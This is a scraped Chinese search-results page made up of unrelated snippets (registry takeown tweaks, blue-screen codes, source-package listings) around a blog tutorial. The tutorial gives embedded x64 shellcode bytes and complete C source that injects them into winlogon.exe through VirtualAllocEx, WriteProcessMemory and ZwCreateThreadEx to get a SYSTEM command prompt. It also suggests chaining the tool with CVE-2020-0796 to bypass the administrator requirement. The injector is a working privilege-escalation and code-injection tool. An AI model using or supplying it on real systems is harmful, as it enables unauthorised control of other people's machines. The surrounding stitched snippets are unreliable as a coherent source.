精华内容
下载资源
问答
  • win10系统获取权限代码

    千次阅读 2017-12-28 20:57:03
    win10系统获取权限代码System Managed Accounts Group ------------------------------------- win7/8系统获取权限代码: Windows Registry Editor Version 5.00 [-HKEY_CLASSES_...






    win10系统获取权限代码:


    System Managed Accounts Group








    -------------------------------------
    win7/8系统获取权限代码:


    Windows Registry Editor Version 5.00
    [-HKEY_CLASSES_ROOT\*\shell\runas]
    [HKEY_CLASSES_ROOT\*\shell\runas]
    @="获取超级管理员权限"
    "Icon"="C:\\Windows\\System32\\imageres.dll,-78"
    "NoWorkingDirectory"=""
    [HKEY_CLASSES_ROOT\*\shell\runas\command]
    @="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
    "IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
    [-HKEY_CLASSES_ROOT\Directory\shell\runas]
    [HKEY_CLASSES_ROOT\Directory\shell\runas]
    [HKEY_CLASSES_ROOT\Directory\shell\runas\command]
    @="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
    "IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
    [-HKEY_CLASSES_ROOT\dllfile\shell]
    [HKEY_CLASSES_ROOT\dllfile\shell\runas]
    @="获取超级管理员权限"
    "HasLUAShield"=""
    "NoWorkingDirectory"=""
    [HKEY_CLASSES_ROOT\dllfile\shell\runas\command]
    [-HKEY_CLASSES_ROOT\Drive\shell\runas]
    [HKEY_CLASSES_ROOT\Drive\shell\runas]
    [HKEY_CLASSES_ROOT\Drive\shell\runas\command]
    展开全文
  • 之前写过一篇远线程注入与一篇shellcode编写的文章: ...首先我们要清楚如何获取一个具有system权限的cmd,想要获取一个具有system权限的cmd,首先这个cmd得是一个具有system权限进程的子进程,windows下具有sys

    之前写过一篇远线程注入与一篇shellcode编写的文章:
    Win10_X64远线程注入dll(非CreateRemoteThread)
    Windows 10_X64环境shellcode编写
    上一次是通过远线程注入,将指定的dll模块加载进我们指定的进程,这一次将我们写好的shellcode注入进指定的进程,从而执行任意代码。
    首先我们要清楚如何获取一个具有system权限的cmd,想要获取一个具有system权限的cmd,首先这个cmd得是一个具有system权限进程的子进程,windows下具有system权限的进程有:winlogon.exe、wininit.exe等,这次我们就通过对winlogon.exe进行远线程注入shellcode拿到一个system权限的cmd。

    shellcode

    首先明确shellcode是有一段汇编代码编写而成,然后转为机器码存在内存中然后直接从内存中去执行的数据,关于shellcode的代码编写此处不做详细介绍可以去看之前的那一篇,我们直接从用编译好的exe提取机器码的部分开始。
    很多人对提取机器码都感到头疼,都觉得那是一项体力活,其实只要掌握善用动态调试工具就可以轻松的搞到机器码。

    首先打开x64dbg,将我们刚刚用nasm编译好的程序拖入x64dbg
    在这里插入图片描述
    可以看到这并不是我们要的汇编代码,这些代码是由编译器生成用于将我们的程序正确被进程加载器加载的一段代码,想要找到我们的汇编代码,可以直接选中符号,然后选中我们编译好的进程,就能看到我们要找的代码了
    在这里插入图片描述
    在这里插入图片描述
    这就是我们想要的代码也就是在上一篇文章中写好的汇编程序,现在我们来提取机器码,首先将我们写好要注入的代码全部选中,然后右击选“二进制->复制”,就可以得到我们需要的机器码
    在这里插入图片描述

    注入程序

    然后来写C语言部分,这部分其实就是一个远线程注入程序。
    首先将刚刚拿到的机器码拷入我们的程序源代码,因为我们需要的是十六进制数组的形式,可以利用记事本自带的替换功能,吧所有的空格替换为“,0x”即可,然后直接粘贴进程序

    //shellcode机器码
    unsigned char shellcode[] = 
    {
    	0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x48,0x83,0xEC,0x28,0x4D,0x31,0xC0,0x48,0x31,0xC9,0x4D,0x31,0xD2,0x49,0x83,
    	0xC2,0x60,0x65,0x49,0x8B,0x02,0x48,0x8B,0x40,0x18,0x48,0x8B,0x70,0x20,0x48,0xAD,0x48,0x96,0x48,0xAD,0x48,0x8B,
    	0x58,0x20,0x4D,0x31,0xC0,0x44,0x8B,0x43,0x3C,0x48,0x31,0xD2,0x4C,0x89,0xC2,0x48,0x01,0xDA,0x48,0xC7,0xC0,0xFF,
    	0xFF,0xFF,0xFF,0x48,0x2D,0x77,0xFF,0xFF,0xFF,0x44,0x8B,0x04,0x02,0x49,0x01,0xD8,0x48,0x31,0xF6,0x41,0x8B,0x70,
    	0x20,0x48,0x01,0xDE,0x48,0x31,0xC9,0x41,0xB9,0x57,0x69,0x6E,0x45,0x48,0xFF,0xC1,0x48,0x31,0xC0,0x8B,0x04,0x8E,
    	0x48,0x01,0xD8,0x44,0x39,0x08,0x75,0xEF,0x48,0x31,0xF6,0x41,0x8B,0x70,0x24,0x48,0x01,0xDE,0x66,0x8B,0x0C,0x4E,
    	0x48,0x31,0xF6,0x41,0x8B,0x70,0x1C,0x48,0x01,0xDE,0x48,0x31,0xD2,0x8B,0x14,0x8E,0x48,0x01,0xDA,0x48,0x89,0xD7,
    	0x48,0xC7,0xC0,0xFF,0xFF,0xFF,0xFF,0x48,0x2D,0x9C,0x92,0x9B,0xFF,0x50,0x48,0x89,0xE1,0x48,0x31,0xD2,0x48,0x83,
    	0xC2,0x05,0xFF,0xD7,0x48,0x83,0xC4,0x30,0x5D,0x5F,0x5E,0x5B,0x5A,0x59,0x58,0xC3
    };
    

    然后开始编写注入程序,首先要对我们的进程本身获得调试权限

    /*
    设定本进程的程序调试权限
    lPcstr:权限字符串
    backCode:错误返回码
    */
    BOOL GetDebugPrivilege(
    _In_ LPCSTR lPcstr,
    _Inout_ DWORD* backCode
    )
    {
    	HANDLE Token = NULL;
    	LUID luid = { 0 };
    	TOKEN_PRIVILEGES Token_privileges = { 0 };
    	//内存初始化为zero
    	memset(&luid, 0x00, sizeof(luid));
    	memset(&Token_privileges, 0x00, sizeof(Token_privileges));
    
    	//打开进程令牌
    	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &Token))
    	{
    		*backCode = 0x01;
    		return FALSE;
    	}
    
    	//获取特权luid
    	if (!LookupPrivilegeValue(NULL,lPcstr,&luid))
    	{
    		*backCode = 0x02;
    		return FALSE;
    	}
    
    	//设定结构体luid与特权
    	Token_privileges.PrivilegeCount = 1;
    	Token_privileges.Privileges[0].Luid = luid;
    	Token_privileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    
    	//修改进程特权
    	if (!AdjustTokenPrivileges(Token, FALSE, &Token_privileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL))
    	{
    		*backCode = 0x03;
    		return FALSE;
    	}
    	*backCode = 0x00;
    	return TRUE;
    }
    

    然后我们还需要一个函数用来获取进程快照,然后遍历获取找到我们指定的进程并获取其pid

    int GetProcessPid(
    	_In_ const char* ProcessName,
    	_Inout_ DWORD* backCode
    )
    {
    	PROCESSENTRY32 P32 = { 0 };
    	HANDLE H32 = NULL;
    	//内存初始化为zeor
    	memset(&P32, 0X00, sizeof(P32));
    	//创建快照
    	H32 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    	P32.dwSize = sizeof(P32);
    	if (H32 == NULL)
    	{
    		*backCode = 0x01;
    		return -1;
    	}
    	//开始循环遍历进程
    	BOOL ret = Process32First(H32, &P32);
    	while (ret)
    	{
    		//发现指定进程存在
    		if (!strcmp(P32.szExeFile, ProcessName))
    		{
    			*backCode = 0x00;
    			return P32.th32ProcessID;
    		}
    		ret = Process32Next(H32, &P32);
    	}
    	*backCode = 0x01;
    	return -1;
    }
    

    下面开始编写主程序,

    1. 首先自然是调用上面第一个函数获取调试权限(这一步省略好像也没关系,在我的机器上是这样)。
    2. 然后调用第二个函数获取winlogon.exe的进程id。
    3. 根据pid打开进程
    4. 使用VirtualAllocEx函数在我们打开的进程中申请内存
    5. 使用WriteProcessMemory函数将我们的shellcode写进刚刚申请得到的虚拟内存中
    6. 通过加载ntdll.dll动态库获取到内核函数ZwCreateThreadEx并使用
    7. 调用ZwCreateThreadEx函数创建远线程,执行我们的shellcode
    8. 一些善后处理,该释放的释放该退出的退出
    /*
    主函数
    */
    int main(int argv, char* argc[])
    {
    	//对必要的变量进行声明以及初始化
    	DWORD backCode = 0;
    	HANDLE hProcess = NULL;
    	LPVOID Buff = NULL;
    	HMODULE Ntdll = NULL;
    	SIZE_T write_len = 0;
    	DWORD dwStatus = 0;
    	HANDLE hRemoteThread = NULL;
    
    	//通过进程名获取pid
    	int pid = GetProcessPid("winlogon.exe", &backCode);
    	if (pid == -1)
    	{
    		puts("pid get error");
    		return 0;
    	}
    
    	//提升进程特权,获得调试权限
    	if (!GetDebugPrivilege(SE_DEBUG_NAME, &backCode))
    	{
    		puts("DBG privilege error");
    		printf(" %d", backCode);
    		return 0;
    	}
    
    	//打开要被注入的进程
    	if ((hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid)) == NULL)
    	{
    		puts("process open erro");
    		return 0;
    	}
    
    	//在要被注入的进程中创建内存,用于存放注入dll的路径
    	Buff = VirtualAllocEx(hProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    	if (Buff == NULL)
    	{
    		puts("Buff alloc error");
    		return 0;
    	}
    
    	//将dll路径写入刚刚创建的内存中
    	WriteProcessMemory(hProcess, Buff, shellcode, sizeof(shellcode), &write_len);
    	if (sizeof(shellcode) != write_len)
    	{
    		puts("write error");
    		return 0;
    	}
    
    	//加载ntdll.dll并从中获取内核函数ZwCreateThread,并使用函数指针指向此函数
    	Ntdll = LoadLibrary("ntdll.dll");
    	pZwCreateThreadEx ZwCreateThreadEx =
    		(pZwCreateThreadEx)GetProcAddress(Ntdll, "ZwCreateThreadEx");
    	if (ZwCreateThreadEx == NULL)
    	{
    		puts("func get error");
    		return 0;
    	}
    
    	//执行ZwCreateThread函数,在指定进程中创建线程加载要被注入的dll
    	dwStatus = ZwCreateThreadEx(
    		&hRemoteThread,
    		PROCESS_ALL_ACCESS,
    		NULL,
    		hProcess,
    		(LPTHREAD_START_ROUTINE)Buff,
    		NULL,
    		0, 0, 0, 0,
    		NULL
    	);
    	if (hRemoteThread == NULL)
    	{
    		puts("zwcreatethread fun error");
    		return 0;
    	}
    
    	//释放不需要的变量以及内存
    	CloseHandle(hProcess);
    	FreeModule(Ntdll);
    	ExitProcess(0);
    	return 0;
    }
    

    完整代码如下

    /************************************************************
    *                     Author:Pluviophile                    *
    *                    Date:2020/9/27-23:03                   *
    *     E-Mail:1565203609@qq.com/pluviophile12138@outlook.com *
    *         远线程注入,将shellcode指定注入指定的进程执行     *
    *************************************************************/
    
    #pragma once
    #include <string.h>
    #include <stdlib.h>
    #include <stdint.h>
    #include <stdio.h>
    #include <Windows.h>
    #include <TlHelp32.h>
    
    //shellcode机器码
    unsigned char shellcode[] = 
    {
    	0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x48,0x83,0xEC,0x28,0x4D,0x31,0xC0,0x48,0x31,0xC9,0x4D,0x31,0xD2,0x49,0x83,
    	0xC2,0x60,0x65,0x49,0x8B,0x02,0x48,0x8B,0x40,0x18,0x48,0x8B,0x70,0x20,0x48,0xAD,0x48,0x96,0x48,0xAD,0x48,0x8B,
    	0x58,0x20,0x4D,0x31,0xC0,0x44,0x8B,0x43,0x3C,0x48,0x31,0xD2,0x4C,0x89,0xC2,0x48,0x01,0xDA,0x48,0xC7,0xC0,0xFF,
    	0xFF,0xFF,0xFF,0x48,0x2D,0x77,0xFF,0xFF,0xFF,0x44,0x8B,0x04,0x02,0x49,0x01,0xD8,0x48,0x31,0xF6,0x41,0x8B,0x70,
    	0x20,0x48,0x01,0xDE,0x48,0x31,0xC9,0x41,0xB9,0x57,0x69,0x6E,0x45,0x48,0xFF,0xC1,0x48,0x31,0xC0,0x8B,0x04,0x8E,
    	0x48,0x01,0xD8,0x44,0x39,0x08,0x75,0xEF,0x48,0x31,0xF6,0x41,0x8B,0x70,0x24,0x48,0x01,0xDE,0x66,0x8B,0x0C,0x4E,
    	0x48,0x31,0xF6,0x41,0x8B,0x70,0x1C,0x48,0x01,0xDE,0x48,0x31,0xD2,0x8B,0x14,0x8E,0x48,0x01,0xDA,0x48,0x89,0xD7,
    	0x48,0xC7,0xC0,0xFF,0xFF,0xFF,0xFF,0x48,0x2D,0x9C,0x92,0x9B,0xFF,0x50,0x48,0x89,0xE1,0x48,0x31,0xD2,0x48,0x83,
    	0xC2,0x05,0xFF,0xD7,0x48,0x83,0xC4,0x30,0x5D,0x5F,0x5E,0x5B,0x5A,0x59,0x58,0xC3
    };
    
    
    /*判断系统架构,并定义ZwCreateThreadEx函数指针*/
    #ifdef _WIN64
    typedef	DWORD(WINAPI* pZwCreateThreadEx)(
    	PHANDLE ThreadHandle,
    	ACCESS_MASK DesiredAccess,
    	LPVOID ObjectAttributes,
    	HANDLE ProcessHandle,
    	LPTHREAD_START_ROUTINE lpStartAddress,
    	LPVOID lpParameter,
    	ULONG CreateThreadFlags,
    	SIZE_T ZeroBits,
    	SIZE_T StackSize,
    	SIZE_T MaximumStackSize,
    	LPVOID pUnkown
    	);
    #else
    typedef DWORD(WINAPI* pZwCreateThreadEx)(
    	PHANDLE ThreadHandle,
    	ACCESS_MASK DesiredAccess,
    	LPVOID ObjectAttributes,
    	HANDLE ProcessHandle,
    	LPTHREAD_START_ROUTINE lpStartAddress,
    	LPVOID lpParameter,
    	BOOL CreateSuspended,
    	DWORD dwStackSize,
    	DWORD dw1,
    	DWORD dw2,
    	LPVOID pUnkown
    	);
    #endif
    
    /*
    设定本进程的程序调试权限
    lPcstr:权限字符串
    backCode:错误返回码
    */
    BOOL GetDebugPrivilege(
    _In_ LPCSTR lPcstr,
    _Inout_ DWORD* backCode
    )
    {
    	HANDLE Token = NULL;
    	LUID luid = { 0 };
    	TOKEN_PRIVILEGES Token_privileges = { 0 };
    	//内存初始化为zero
    	memset(&luid, 0x00, sizeof(luid));
    	memset(&Token_privileges, 0x00, sizeof(Token_privileges));
    
    	//打开进程令牌
    	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &Token))
    	{
    		*backCode = 0x01;
    		return FALSE;
    	}
    
    	//获取特权luid
    	if (!LookupPrivilegeValue(NULL,lPcstr,&luid))
    	{
    		*backCode = 0x02;
    		return FALSE;
    	}
    
    	//设定结构体luid与特权
    	Token_privileges.PrivilegeCount = 1;
    	Token_privileges.Privileges[0].Luid = luid;
    	Token_privileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    
    	//修改进程特权
    	if (!AdjustTokenPrivileges(Token, FALSE, &Token_privileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL))
    	{
    		*backCode = 0x03;
    		return FALSE;
    	}
    	*backCode = 0x00;
    	return TRUE;
    }
    
    /*
    根据进程名获取进程pid,执行无误返回进程pid,出错返回-1
    ProcessName:进程名
    backCode:错误返回码
    */
    int GetProcessPid(
    	_In_ const char* ProcessName,
    	_Inout_ DWORD* backCode
    )
    {
    	PROCESSENTRY32 P32 = { 0 };
    	HANDLE H32 = NULL;
    	//内存初始化为zeor
    	memset(&P32, 0X00, sizeof(P32));
    	//创建快照
    	H32 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    	P32.dwSize = sizeof(P32);
    	if (H32 == NULL)
    	{
    		*backCode = 0x01;
    		return -1;
    	}
    	//开始循环遍历进程
    	BOOL ret = Process32First(H32, &P32);
    	while (ret)
    	{
    		//发现指定进程存在
    		if (!strcmp(P32.szExeFile, ProcessName))
    		{
    			*backCode = 0x00;
    			return P32.th32ProcessID;
    		}
    		ret = Process32Next(H32, &P32);
    	}
    	*backCode = 0x01;
    	return -1;
    }
    
    /*
    主函数
    */
    int main(int argv, char* argc[])
    {
    	//对必要的变量进行声明以及初始化
    	DWORD backCode = 0;
    	HANDLE hProcess = NULL;
    	LPVOID Buff = NULL;
    	HMODULE Ntdll = NULL;
    	SIZE_T write_len = 0;
    	DWORD dwStatus = 0;
    	HANDLE hRemoteThread = NULL;
    
    	//通过进程名获取pid
    	int pid = GetProcessPid("winlogon.exe", &backCode);
    	if (pid == -1)
    	{
    		puts("pid get error");
    		return 0;
    	}
    
    	//提升进程特权,获得调试权限
    	if (!GetDebugPrivilege(SE_DEBUG_NAME, &backCode))
    	{
    		puts("DBG privilege error");
    		printf(" %d", backCode);
    		return 0;
    	}
    
    	//打开要被注入的进程
    	if ((hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid)) == NULL)
    	{
    		puts("process open erro");
    		return 0;
    	}
    
    	//在要被注入的进程中创建内存,用于存放注入dll的路径
    	Buff = VirtualAllocEx(hProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    	if (Buff == NULL)
    	{
    		puts("Buff alloc error");
    		return 0;
    	}
    
    	//将dll路径写入刚刚创建的内存中
    	WriteProcessMemory(hProcess, Buff, shellcode, sizeof(shellcode), &write_len);
    	if (sizeof(shellcode) != write_len)
    	{
    		puts("write error");
    		return 0;
    	}
    
    	//加载ntdll.dll并从中获取内核函数ZwCreateThread,并使用函数指针指向此函数
    	Ntdll = LoadLibrary("ntdll.dll");
    	pZwCreateThreadEx ZwCreateThreadEx =
    		(pZwCreateThreadEx)GetProcAddress(Ntdll, "ZwCreateThreadEx");
    	if (ZwCreateThreadEx == NULL)
    	{
    		puts("func get error");
    		return 0;
    	}
    
    	//执行ZwCreateThread函数,在指定进程中创建线程加载要被注入的dll
    	dwStatus = ZwCreateThreadEx(
    		&hRemoteThread,
    		PROCESS_ALL_ACCESS,
    		NULL,
    		hProcess,
    		(LPTHREAD_START_ROUTINE)Buff,
    		NULL,
    		0, 0, 0, 0,
    		NULL
    	);
    	if (hRemoteThread == NULL)
    	{
    		puts("zwcreatethread fun error");
    		return 0;
    	}
    
    	//释放不需要的变量以及内存
    	CloseHandle(hProcess);
    	FreeModule(Ntdll);
    	ExitProcess(0);
    	return 0;
    }
    
    

    编译执行(必须使用管理员权限)
    在这里插入图片描述
    成功获得system权限cmd
    不足:还是需要先得到管理员权限,如果可以与类似CVE-2020-0796的漏洞合用就可以越过管理员权限

    展开全文
  • WIN XP蓝屏代码大全

    2013-08-08 12:29:21
    WIN XP蓝屏代码大全 一、蓝屏含义 1、故障检查信息 ***STOP 0x0000001E(0xC0000005,0xFDE38AF9,0x0000001,0x7E8B0EB4) KMODE_EXCEPTION_NOT_HANDLED ***其中错误的第一部分是停机码(Stop Code)也就是STOP 0x0000001E...
  • icacls.exe "%windir%\system32\我的输入法.mb" /SetIntegrityLevel Level src="./images/smilies/sweat.gif" border=0 smilieid="10"> 3、自定义目录码表目录的例子,输入法为winwb86: Windows Registry Editor ...
  • pcf8563_i2c1_r8_ruoge_ov2640通过给RTC驱动增加设备节点读取秒钟成功+直接读取I2C1获取秒钟值20160626_2201.7z http://blog.csdn.net/21cnbao/article/details/7919055 在Android源码树中添加userspace I2C读写...
  •  而且更奇怪的是,在我开发的机器上和经理的电脑上都报这个错误,但是在业务的员工的电脑上没出现这个错误,所以推测是代码的某些部分可能存在不兼容的问题,因为我的电脑和经理的电脑是win7的系统,业务的员工的电脑是...
  • vc++ 应用源码包_6

    热门讨论 2012-09-15 14:59:46
    一共10几包,每个包几十兆。 Visual.C++编程技巧精选500例源代码 内含各种例子(vc下各种控件的使用方法、标题栏与菜单栏、工具栏与状态栏、图标与光标、程序窗口、程序控制、进程与线程、字符串、文件读写操作、...
  • vc++ 应用源码包_5

    热门讨论 2012-09-15 14:45:16
    一共10几包,每个包几十兆。 Visual.C++编程技巧精选500例源代码 内含各种例子(vc下各种控件的使用方法、标题栏与菜单栏、工具栏与状态栏、图标与光标、程序窗口、程序控制、进程与线程、字符串、文件读写操作、...
  • vc++ 应用源码包_1

    热门讨论 2012-09-15 14:22:12
    Visual.C++编程技巧精选500例源代码 内含各种例子(vc下各种控件的使用方法、标题栏与菜单栏、工具栏与状态栏、图标与光标、程序窗口、程序控制、进程与线程、字符串、文件读写操作、文件与文件夹属性操作、文件与...
  • vc++ 应用源码包_2

    热门讨论 2012-09-15 14:27:40
    代码里用了备份dll的方法,因此在自定义的函数中可以直接调用在内存中备份的dll代码,而不需要再把函数头部改来改去。 IOCP反弹远控客户端模型,外加上线服务端,全部代码注释! 如题。这个是IOCP远程控制软件的...
  • vc++ 应用源码包_4

    热门讨论 2012-09-15 14:38:35
    代码里用了备份dll的方法,因此在自定义的函数中可以直接调用在内存中备份的dll代码,而不需要再把函数头部改来改去。 IOCP反弹远控客户端模型,外加上线服务端,全部代码注释! 如题。这个是IOCP远程控制软件的...
  • vc++ 应用源码包_3

    热门讨论 2012-09-15 14:33:15
    代码里用了备份dll的方法,因此在自定义的函数中可以直接调用在内存中备份的dll代码,而不需要再把函数头部改来改去。 IOCP反弹远控客户端模型,外加上线服务端,全部代码注释! 如题。这个是IOCP远程控制软件的...
  • 8.1.2 设置用户使用查询的权限 183 8.1.3 使用命名约定和查询文档 185 8.2 运用选择查询:使用查询设计网格 187 8.2.1 表的联接 188 8.2.2 同一个表使用两次(自联接) 189 8.2.3 使用Access的自动查阅...
  • 注意:软件运行需要管理员权限以及Debug进程权限,否则将无法使用。运行环境理论上只支持WinXP,不过经测试在Win7(32位)下也可以使用软件部分功能。 另外:软件运行可能会被杀毒软件所提示,这属于正常现象。例如...
  • Access2000中文版高级编程 目录 第一部分 编程基础 1 第1章 宏与代码 3 1.1 何时使用代码代替宏 4 ...15.4.3 在Win32api.txt文件中查找API调用 477 15.5 使用API调用的注意事项 479 15.5.1 ...
  • vc++ 开发实例源码包

    2014-12-16 11:25:17
    10:下载管理,虚拟文件夹. 11:自动ping. 12:连接到搜索引擎. 13:自动报告bug,建议等. 14:宏功能. 15:自动同步文件夹. 16:保存加载任务. 17:计划任务. 18:单线程下载时不能创建临时文件. 19:下载流文件(rm,Media ...
  • 8.程序提升权限。支持Win7系统 9.修复程序在快速双击列表提示索引错误的Bug 10.修复搜索歌曲时输入乱码程序崩溃的BUg 11.新增窗体靠边隐藏功能,(模拟QQ),位置:屏幕左。左上。右,右上,上部 隐藏、 12.修复下载...
  • - 全平台兼容性:Win Linux Mac (Apache、Nginx、IIS) #### 2.使用场景: - 取代FTP,服务端、客户端软件等复杂的安装配置。kod可以一键安装随处使用. - 你可以用它来管理你的服务器(备份,在线解压缩,版本发布......
  • asp.net知识库

    2015-06-18 08:45:45
    Coalesys PanelBar + R.a.d Treeview +Xml 构建的Asp.net 菜单和权限管理模块 突破屏蔽限制,自己的网站使劲弹新IE窗口 对页面SCROLLING的CSS不能生效原因 .Net 中IE使用WinForm控件的使用心得。 动态加载用户控件的...
  • 可能使用xFsRedir程序的地方, xFsRedir程序运行在各类windows平台(WINXP, WIN7,WIN8,WIN10): 1,想把各类文件集中到本地电脑,扩展磁盘容量,比如大量的视频文件放到专门的服务器上, 利用此软件可以把这些...
  • winsxs清理小工具BAT文件

    热门讨论 2013-05-18 20:48:33
    1.代码的开头部分是用ver命令获取系统的版本号,并且存放到%winver%变量中,比如我的ver命令返回就是“Microsoft Windows [版本 6.0.6002]”,为了获取这个“6.0.6002”,所以要做一些处理,另外,%ver_prefix%中...
  • 6、无法使用视频签到,看不到图像 : 进入 C:\windows\system32\macromed\flash\mms.cfg 这个进程,不要搜索,要手动,因为C盘把这些设为自动隐藏文件,然后删除mms.cfg,重启。 【第一次登录使用】 全新安装和...
  • 电脑蓝屏对照码

    2019-05-05 14:16:40
    WIN XP蓝屏代码大全 一、蓝屏含义 1、故障检查信息 ***STOP 0x0000001E(0xC0000005,0xFDE38AF9,0x0000001,0x7E8B0EB4) KMODE_EXCEPTION_NOT_HANDLED ***其中错误的第一部分是停机码(Stop Code)也就是STOP 0x0000001E...
  • icacls.exe "%windir%\system32\我的输入法.mb" /SetIntegrityLevel Level src="./images/smilies/sweat.gif" border=0 smilieid="10"> 3、自定义目录码表目录的例子,输入法为winwb86: Windows Registry Editor...
  • 易语言 茶凉专用模块

    2010-05-04 12:26:36
    参数 功能键方式, 逻辑型, 可空, 默认为普通键, 真:功能键方式模拟,如ctrl键win键home键光标键等 .子程序 按键消息, , 公开, 向指定窗口句柄的窗口中发送按键消息(无返回值) .参数 窗口句柄, 整数型, , 接收消息的...
  • 新版Android开发教程.rar

    千次下载 热门讨论 2010-12-14 15:49:11
    System System System System Requirements Requirements Requirements Requirements The sections below describe the system and software requirements for developing Android applications using the Android ...
  • 易语言辅助模块

    2013-02-14 19:52:02
    如果参数被省略,默认为10 .子程序 窗口嵌入, 逻辑型, 公开, 将指定窗口嵌入到另一个顶级窗口中,成功返回(真),失败返回(假) .参数 子窗口句柄, 整数型 .参数 父窗口句柄, 整数型, , 如:桌面→桌面标题=“Program...
  • 测试培训教材

    2014-04-01 12:10:48
    Note: To run a system test, you must install the System Test Remote Agent Add-in and the Mercury Quality Center Connectivity Add-in on the machine where the test is to be run. For more information on ...
  • INT:中间代码,当一个源程序经过语法检查后编译产生一个可执行代码 IOF:Findit文档 IQY:Microsoft Internet查询文件 ISO:根据ISD 9660有关CD-ROM文件系统标准列出CD-ROM上的文件 ISP:X-Internet签字文件 ...

空空如也

空空如也

1 2
收藏数 29
精华内容 11
关键字:

win10获取system权限代码